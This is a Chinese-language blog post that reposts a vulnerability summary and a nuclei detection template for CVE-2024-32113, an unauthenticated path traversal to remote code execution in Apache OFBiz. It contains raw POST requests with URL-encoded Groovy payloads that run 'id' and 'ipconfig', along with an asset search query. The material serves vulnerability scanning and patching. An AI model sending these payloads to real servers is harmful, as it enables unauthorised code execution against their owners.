Apache OFBiz Directory Traversal - Remote Code Execution

漏洞信息

漏洞名称: Apache OFBiz Directory Traversal - Remote Code Execution

漏洞编号:

  • CVE: CVE-2024-32113

漏洞类型: 目录遍历

漏洞等级: 高危

漏洞描述: Apache OFBiz是一个开源的企业资源规划(ERP)系统,广泛应用于企业级服务中,提供包括电子商务、供应链管理、客户关系管理等多种功能。由于其广泛的应用场景,该系统的安全性对企业运营至关重要。此次发现的漏洞属于目录遍历类型,具体表现为路径名限制不当,允许攻击者通过构造特殊的请求路径,绕过系统对文件访问的限制,进而实现远程代码执行。该漏洞的技术根源在于系统未能正确验证和限制用户输入的路径名,导致攻击者可以利用路径遍历技术访问受限目录之外的文件。这种漏洞的存在使得攻击者可以在未授权的情况下执行任意代码,可能导致数据泄露、服务中断等严重后果。由于该漏洞的利用不需要用户认证,且可以通过自动化工具进行大规模扫描和攻击,因此对受影响系统的安全构成了严重威胁。建议用户尽快升级到18.12.13版本以修复此漏洞。

产品厂商: Apache

产品名称: Apache OFBiz

影响版本: before 18.12.13

搜索语法: app=”Apache_OFBiz”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/42f1d3e828e05fcdfde0ea0ddf3f868a78c9acbc/http%2Fcves%2F2024%2FCVE-2024-32113.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66

id: CVE-2024-32113

info:
name: Apache OFBiz Directory Traversal - Remote Code Execution
author: DhiyaneshDK
severity: high
description: |
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache OFBiz.This issue affects Apache OFBiz: before 18.12.13
remediation: |
Users are recommended to upgrade to version 18.12.13, which fixes the issue.
reference:
- https://issues.apache.org/jira/browse/OFBIZ-13006
- https://lists.apache.org/thread/w6s60okgkxp2th1sr8vx0ndmgk68fqrd
- https://ofbiz.apache.org/download.html
- https://ofbiz.apache.org/security.html
- https://github.com/absholi7ly/Apache-OFBiz-Directory-Traversal-exploit
- https://nvd.nist.gov/vuln/detail/CVE-2024-32113
classification:
cve-id: CVE-2024-32113
epss-score: 0.93490
epss-percentile: 0.99819
cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
fofa-query: app="Apache_OFBiz"
product: ofbiz
vendor: apache
tags: cve,cve2024,apache,obiz,rce,kev

http:
- raw:
- |
POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

groovyProgram=%74%68%72%6f%77%20%6e%65%77%20%45%78%63%65%70%74%69%6f%6e(%27%69%64%27.%65%78%65%63%75%74%65().%74%65%78%74);

- |
POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

groovyProgram=%74%68%72%6f%77%20%6e%65%77%20%45%78%63%65%70%74%69%6f%6e(%27%69%70%63%6F%6E%66%69%67%27.%65%78%65%63%75%74%65().%74%65%78%74);

matchers-condition: and
matchers:
- type: regex
part: body
regex:
- 'IPv4 Address[\s.]*:\s*(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})'
- 'uid=\d+\(([^)]+)\) gid=\d+\(([^)]+)\)'
condition: or

- type: word
part: body
words:
- 'java.lang.Exception'

- type: status
status:
- 200



Apache OFBiz Directory Traversal - Remote Code Execution
http://example.com/2025/07/11/github_2797307313/
作者
lianccc
发布于
2025年7月11日
许可协议